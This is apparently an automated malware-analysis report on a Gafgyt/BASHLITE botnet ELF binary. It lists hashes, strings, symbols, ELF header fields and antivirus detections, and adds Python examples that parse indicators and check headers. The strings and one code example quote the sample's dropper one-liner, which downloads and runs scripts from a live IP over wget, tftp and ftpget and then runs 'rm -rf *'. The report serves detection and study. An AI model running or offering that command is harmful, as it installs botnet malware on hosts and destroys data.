Report #1780

Binary
ABI
ELFOSABI_SYSV
Size
101.92KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
81c96bb4a0f02af89c32d5e9d6a62701
sha1
2f7c9541ab0575c7c9eacd41caaaf027e3436eaa
crc32
0xbc93238e
sha224
5c43ee49e827b30c371a6113380558c956191546a676615400f8d507
sha256
ac3cd620bc7891a2d62926158c1da970d5b0224e9f1f5fe44a2978ae2219b1f2
sha384
93fc459696485ff7337232f774b893ab0f84a913d0d4255b80fe3a11e5eee4f7df1b66b7376c1e36745fd8162a9e3996
sha512
333630359bcf2c7c0c39ce96eff9c72f8e595c7ee812049c2c3aedfab2412e6eb692dd727d781cb0347fd92c77a95787f5a785fb468c23b76102feddd7c61fa7
ssdeep
3072:dkSa5EJmeM4OqMdBwdSAGtDbhd5+hVgxsKcX6GcgbqB:dkAUHEnGtXhd5+TgxsKcXJcgbqB
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, Gafgyt_Botnet_jackmy, is__elf

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
194.135.82.240
URLs
http://194.135.82.240/Merkury.sh
(both taken from the download-and-execute one-liner listed under Strings)
Mails

Suspicious
True
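The download-and-execute one-liner carried in this sample is the most actionable artifact in the report: it names the payload server, three fetch protocols (HTTP via wget, TFTP in both BusyBox argument forms, anonymous FTP via ftpget), the staged script names, and a final `rm -rf *` that destroys the evidence. As an added example that is not part of the original report or of the sample, the following Python turns that string into structured indicators. The input is quoted from the report's Strings section; the parser only handles literal IPv4 servers (this string uses one) and the BusyBox tftp/ftpget argument conventions that appear in it.

```python
import re
from dataclasses import dataclass, field

# Constructed input: the download-and-execute one-liner quoted from this
# report's Strings section (not captured from a live host).
DROPPER = (
    "cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/* || /var/run/* || "
    "/var/system/* || /mnt/* || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "wget http://194.135.82.240/Merkury.sh; chmod 777 Merkury.sh; sh Merkury.sh; "
    "tftp 194.135.82.240 -c get Merkurytftp1.sh; chmod 777 Merkurytftp1.sh; sh Merkurytftp1.sh; "
    "tftp -r Merkurytftp2.sh -g 194.135.82.240; chmod 777 Merkurytftp2.sh; sh Merkurytftp2.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 194.135.82.240 ftp1.sh ftp1.sh; sh ftp1.sh; "
    "rm -rf Merkury.sh Merkurytftp1.sh Merkurytftp2.sh ftp1.sh; rm -rf *"
)

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s;'\"]+")


@dataclass
class Stage:
    proto: str        # wget / tftp / ftpget
    host: str         # payload server
    filename: str     # name the payload is written to on disk
    creds: str = ""   # only the FTP stage carries credentials


@dataclass
class DropperIOCs:
    hosts: set = field(default_factory=set)
    urls: set = field(default_factory=set)
    stages: list = field(default_factory=list)    # in execution order
    executed: list = field(default_factory=list)  # scripts run via "sh"
    workdirs: list = field(default_factory=list)  # every "cd" candidate
    wipes_cwd: bool = False                       # trailing "rm -rf *"


def _after(args, flag):
    """Token following `flag` in an argv list, or '' if absent."""
    try:
        return args[args.index(flag) + 1]
    except (ValueError, IndexError):
        return ""


def parse_dropper(cmdline: str) -> DropperIOCs:
    """Split the one-liner on ';' and '||' and classify each simple command."""
    iocs = DropperIOCs()
    for segment in cmdline.split(";"):
        for simple in segment.split("||"):
            argv = simple.split()
            if not argv:
                continue
            cmd, args = argv[0], argv[1:]
            m = IPV4.search(simple)
            host = m.group() if m else ""
            if cmd == "cd" and args:
                iocs.workdirs.append(args[0])
            elif cmd == "wget":
                for url in URL.findall(simple):
                    iocs.urls.add(url)
                    iocs.stages.append(Stage("wget", host, url.rsplit("/", 1)[-1]))
            elif cmd == "tftp":
                # BusyBox accepts "tftp HOST -c get FILE" and "tftp -r FILE -g HOST"
                fname = _after(args, "get") or _after(args, "-r")
                if host and fname:
                    iocs.stages.append(Stage("tftp", host, fname))
            elif cmd == "ftpget" and host:
                # BusyBox ftpget: ftpget [OPTIONS] HOST LOCAL_FILE [REMOTE_FILE]
                local = _after(args, host)
                creds = f"{_after(args, '-u')}:{_after(args, '-p')}"
                iocs.stages.append(Stage("ftpget", host, local, creds))
            elif cmd == "sh" and args:
                iocs.executed.append(args[0])
            elif cmd == "rm" and "*" in args:
                iocs.wipes_cwd = True
            if host:
                iocs.hosts.add(host)
    return iocs


if __name__ == "__main__":
    r = parse_dropper(DROPPER)
    print("hosts:", sorted(r.hosts))
    for s in r.stages:
        print(f"{s.proto:7} {s.host:16} {s.filename} {s.creds}")
    print("executed:", r.executed, "wipes cwd:", r.wipes_cwd)
```

The stage list maps directly onto network detections: one HTTP GET for /Merkury.sh, two TFTP read requests and one anonymous FTP login, all to the same server. That is a useful pivot when a feed only hands you the HTTP URL, since the TFTP and FTP stages would otherwise go unwatched.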
Strings
List
cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/* || /var/run/* || /var/system/* || /mnt/* || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.135.82.240/Merkury.sh; chmod 777 Merkury.sh; sh Merkury.sh; tftp 194.135.82.240 -c get Merkurytftp1.sh; chmod 777 Merkurytftp1.sh; sh Merkurytftp1.sh; tftp -r Merkurytftp2.sh -g 194.135.82.240; chmod 777 Merkurytftp2.sh; sh Merkurytftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.135.82.240 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Merkury.sh Merkurytftp1.sh Merkurytftp2.sh ftp1.sh; rm -rf *
%s %s HTTP/1.1
/etc/rc.conf
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
None Killed.
User-Agent: %s
Network is down
Machine is not on the network
Killed %d.
No route to host
Host is down
194.135.82.240
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
been_there_done_that.3001
been_there_done_that
_fwrite.c
open.c
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
Remote address changed
No such device or address
Operation now in progress
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
COMMENCING BOT KILL ON -> %s
fork failed
Link has been severed
Object is remote
Too many open files
Too many links
Is a named type file
Connection reset by peer
Too many open files in system
No such device
BUILD %s:%s
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
LOGIN FOUND - %s:%s:%s
Operation not permitted
Invalid flag "%s"
Connection: %s
8.8.8.8
My Public IP: %s
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
__GI_execve
__register_frame_info_bases
usleep.c
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
gethostbyname_r
gethostbyname.c
socket_connect
opennameservers.c
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
read_etc_hosts_r.c
__socketcall.c
fflush_unlocked
socket.c
__nameservers
__read_etc_hosts_r
__get_hosts_byname_r
__open_etc_hosts
__GI_socket
sleep.c
sendHTTP
tcpcsum
PONG
HTTP
pipe.c
Software caused connection abort
Socket operation on non-socket
inet_addr
/boot/
sbtftp
sstftp
currentServer
sttftp
PromServer
STARTING SCANNER ON -> %s
Identifier removed

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, PrometheusV4.c, c, Q, i.4259, printchar, prints, printi, print, fdopen_pids, hextable, ipState, C.482.7624, C.531.7997, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getcwd.c, getdtablesize.c, getpagesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, fclose.c, fopen.c, sprintf.c, vsnprintf.c, _fopen.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, feof.c, fgets.c, fputs.c, fflush_unlocked.c, fgets_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strcasecmp.c, strcasestr.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, realloc.c, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, 
mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, usleep.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getuid.c, mremap.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fgetc_unlocked.c, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, poll.c, fseeko.c, fseeko64.c, _READ.c, _adjust_pos.c, _rfill.c, _trans2r.c, _cs_funcs.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, encoded.c, decoded.c, lengthd.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, recv, connect, __encode_question, GetRandomPublicIP, __GI___uClibc_fini, numpids, 
__encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, __GI_setsid, memmove, sendTCP, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, read_until_response, __GI_sbrk, zprintf, __GI___uClibc_init, usleep, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, __GI_fputs_unlocked, execl, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, GetRandomIP, tolower, getuid, system, __open_etc_hosts, feof, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, reset_telstate, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, __GI_fputs, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, 
getBuild, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_brk, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, PromServer, __raise, setsockopt, bsd_signal, fseek, mremap, __GI_kill, __GI_strcmp, __GI_memmove, sendSTD, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, tmpdirs, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, getCores, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, realloc, __GI_gethostbyname_r, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, ClearHistory, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __stdio_rfill, strncat, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __GI_mremap, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, ourPublicIP, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, botkiller, strcmp, advances2, __nameserver, 
data_start, __GI_sysconf, infect, __h_errno_location, matchPrompt, getcwd, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, advance_state, _fini, __GI_chdir, __vfork, __GI_mmap, knownBots, contains_success, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __decode_answer, __GI_signal, stderr, fails, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __libc_fork, __atexit_lock, scanPid, rand_cmwc, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, __GI_getcwd, _dl_aux_init, _errno, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, fputs, __GI_raise, __data_start, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, readUntil, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, mainCommSock, pids, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname
Number
759
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2 (identical for all 170 identified entries)
Identified
170
Suspicious
True
Functions
List
Same names as the Symbols list above (759 entries)
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048168
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
82468
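The Entry Point, Program Header and Section Header values above are read straight from the 52-byte ELF32 file header, as are ABI, Type, Wordsize and Version further up. As an added example that is not part of the report, the following Python decodes such a header and runs the sanity checks worth doing before trusting anything derived from section headers (the Sections, Symbols and Compilers lists): section headers are not needed to execute the file, so packers and strippers routinely drop or corrupt them while the program headers stay intact. The header bytes are constructed from the values in this report; e_shstrndx is not reported and is assumed to be 13, the position of .shstrtab in the section list.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS = {1: "ELFCLASS32", 2: "ELFCLASS64"}
ELFDATA = {1: "ELFDATA2LSB", 2: "ELFDATA2MSB"}
OSABI = {0: "ELFOSABI_SYSV", 3: "ELFOSABI_LINUX"}
ETYPE = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
EMACHINE = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64"}

# Constructed sample: a 52-byte ELF32 little-endian header populated with the
# values this report shows (entry, program/section header offsets, counts,
# sizes). e_shstrndx is not in the report; 13 (.shstrtab's index in the
# Sections list) is an assumption.
SAMPLE_HEADER = (
    ELF_MAGIC + bytes([1, 1, 1, 0, 0]) + b"\0" * 7
    + struct.pack("<HHIIIIIHHHHHH",
                  2, 3, 1, 0x8048168, 52, 82468, 0, 52, 32, 3, 40, 16, 13)
)
SAMPLE_FILE_SIZE = 104366   # 101.92 KB, as reported


def parse_elf_header(data: bytes) -> dict:
    """Decode e_ident plus the fixed ELF32 header fields."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data, ei_osabi = data[4], data[5], data[7]
    if ei_class != 1:
        raise ValueError("only ELFCLASS32 headers are handled here")
    endian = "<" if ei_data == 1 else ">"
    fields = struct.unpack(endian + "HHIIIIIHHHHHH", data[16:52])
    names = ("type", "machine", "version", "entry", "phoff", "shoff", "flags",
             "ehsize", "phentsize", "phnum", "shentsize", "shnum", "shstrndx")
    h = dict(zip(names, fields))
    h.update(cls=ELFCLASS.get(ei_class, ei_class),
             data=ELFDATA.get(ei_data, ei_data),
             osabi=OSABI.get(ei_osabi, ei_osabi),
             type_name=ETYPE.get(h["type"], h["type"]),
             machine_name=EMACHINE.get(h["machine"], h["machine"]))
    return h


def header_sanity(h: dict, file_size: int) -> list:
    """Checks to run before trusting section-derived data from a sample."""
    warnings = []
    if h["ehsize"] != 52:
        warnings.append(f"e_ehsize {h['ehsize']} != 52")
    if h["phentsize"] != 32:
        warnings.append(f"e_phentsize {h['phentsize']} != 32")
    if h["phoff"] + h["phentsize"] * h["phnum"] > file_size:
        warnings.append("program header table extends past end of file")
    if h["shnum"] == 0:
        warnings.append("no section headers (stripped or packed)")
    elif h["shentsize"] != 40:
        warnings.append(f"e_shentsize {h['shentsize']} != 40")
    elif h["shoff"] + h["shentsize"] * h["shnum"] > file_size:
        warnings.append("section header table extends past end of file")
    elif h["shstrndx"] >= h["shnum"]:
        warnings.append("e_shstrndx out of range")
    return warnings


if __name__ == "__main__":
    hdr = parse_elf_header(SAMPLE_HEADER)
    print(f"{hdr['cls']} {hdr['data']} {hdr['osabi']} {hdr['type_name']} "
          f"{hdr['machine_name']} entry=0x{hdr['entry']:x}")
    print(f"phdrs: off={hdr['phoff']} size={hdr['phentsize']} n={hdr['phnum']}")
    print(f"shdrs: off={hdr['shoff']} size={hdr['shentsize']} n={hdr['shnum']}")
    print("warnings:", header_sanity(hdr, SAMPLE_FILE_SIZE) or "none")
```

For this sample the section header table ends at 82468 + 40 * 16 = 83108 bytes, comfortably inside the 101.92 KB file, which is consistent with Packed: False and the fully populated Sections and Symbols lists. When the same check fails on a Gafgyt sample, the symbol-derived fields (function names, compiler strings, the PrometheusV4.c source name) should be treated as absent rather than as evidence.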
AVclass
gafgyt
1
VirusTotal
md5
81c96bb4a0f02af89c32d5e9d6a62701
sha1
2f7c9541ab0575c7c9eacd41caaaf027e3436eaa
SCANS (DETECTION RATE = 42.37%, 25 of 59 engines)

Engine                Detected  Result                           Update    Version
AVG                   True      ELF:DDoS-Y [Trj]                 20170807  8.0.1489.320
CMC                   False                                      20170805  1.1.0.977
MAX                   False                                      20170807  2017.6.26.1
Bkav                  False                                      20170807  1.3.0.9282
K7GW                  False                                      20170807  10.20.24212
ALYac                 False                                      20170807  1.1.1.2
Avast                 True      ELF:DDoS-Y [Trj]                 20170807  8.0.1489.320
Avira                 True      LINUX/Gafgyt.mpond               20170807  8.3.3.4
Baidu                 False                                      20170807  1.0.0.2
Cyren                 True      ELF/Trojan.OSXW-0                20170807  5.4.30.7
DrWeb                 True      Linux.BackDoor.Fgt.44            20170807  7.0.28.2020
GData                 True      Linux.Trojan.Agent.VH9ISO        20170807  A:25.13734B:25.10170
Panda                 False                                      20170807  4.6.4.2
VBA32                 False                                      20170803  3.12.26.4
VIPRE                 False                                      20170807  60118
Zoner                 False                                      20170807  1.0
AVware                False                                      20170807  1.5.0.42
ClamAV                True      Unix.Trojan.Mirai-5607483-0      20170807  0.99.2.0
Comodo                False                                      20170807  27567
F-Prot                False                                      20170807  4.7.1.166
Ikarus                True      Trojan.Linux.Gafgyt              20170807  0.1.5.2
McAfee                True      RDN/Generic BackDoor             20170807  6.0.6.653
Rising                False                                      20170807  25.0.0.1
Sophos                True      Linux/DDoS-BI                    20170807  4.98.0
Yandex                False                                      20170801  5.5.1.3
Zillya                False                                      20170806  2.0.0.3355
Arcabit               False                                      20170807  1.0.0.817
Tencent               True      Linux.Backdoor.Gafgyt.Eanh       20170807  1.0.0.1
ViRobot               False                                      20170807  2014.3.20.0
Webroot               False                                      20170807  1.0.0.207
Ad-Aware              False                                      20170807  3.0.3.1010
AegisLab              True      Backdoor.Linux.Gafgyt!c          20170807  4.2
Emsisoft              False                                      20170807  4.0.1.883
F-Secure              False                                      20170807  11.0.19100.45
Fortinet              True      Linux/Gafgyt.B!tr                20170807  5.4.247.0
Jiangmin              True      Backdoor.Linux.rca               20170807  16.0.100
Kingsoft              False                                      20170807  2013.8.14.323
Symantec              True      Linux.Lightaidra                 20170807  1.4.0.0
nProtect              False                                      20170807  2017-08-07.02
AhnLab-V3             True      Linux/Jackdos.Gen                20170807  3.9.2.18278
Antiy-AVL             True      Trojan[Backdoor]/Linux.Gafgyt.y  20170807  3.0.0.1
Kaspersky             True      HEUR:Backdoor.Linux.Gafgyt.y     20170807  15.0.1.13
Microsoft             False                                      20170807  1.1.14003.0
Qihoo-360             True      Win32/Trojan.DDoS.1be            20170807  1.0.0.1120
TheHacker             False                                      20170806  6.8.0.5.1813
ZoneAlarm             True      HEUR:Backdoor.Linux.Gafgyt.y     20170807  1.0
ESET-NOD32            True      a variant of Linux/Gafgyt.C      20170807  15873
TrendMicro            True      Possible_BASHLITE.SMLBN1         20170807  9.862.0.1074
WhiteArmor            False                                      20170731  (not reported)
BitDefender           False                                      20170807  7.2
K7AntiVirus           False                                      20170807  10.20.24214
Malwarebytes          False                                      20170807  2.1.1.1115
TotalDefense          False                                      20170807  37.1.62.1
CAT-QuickHeal         False                                      20170807  14.00
NANO-Antivirus        True      Trojan.Unix.Gafgyt.eikqfj        20170807  1.0.94.18103
MicroWorld-eScan      False                                      20170807  12.0.250.0
SUPERAntiSpyware      False                                      20170807  5.6.0.1032
McAfee-GW-Edition     True      RDN/Generic BackDoor             20170807  v2015
TrendMicro-HouseCall  True      Possible_BASHLITE.SMLBN1         20170807  9.950.0.1006

total
59
sha256
ac3cd620bc7891a2d62926158c1da970d5b0224e9f1f5fe44a2978ae2219b1f2
scan_id
ac3cd620bc7891a2d62926158c1da970d5b0224e9f1f5fe44a2978ae2219b1f2-1502108155
resource
81c96bb4a0f02af89c32d5e9d6a62701
positives
25
scan_date
2017-08-07 12:15:55
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True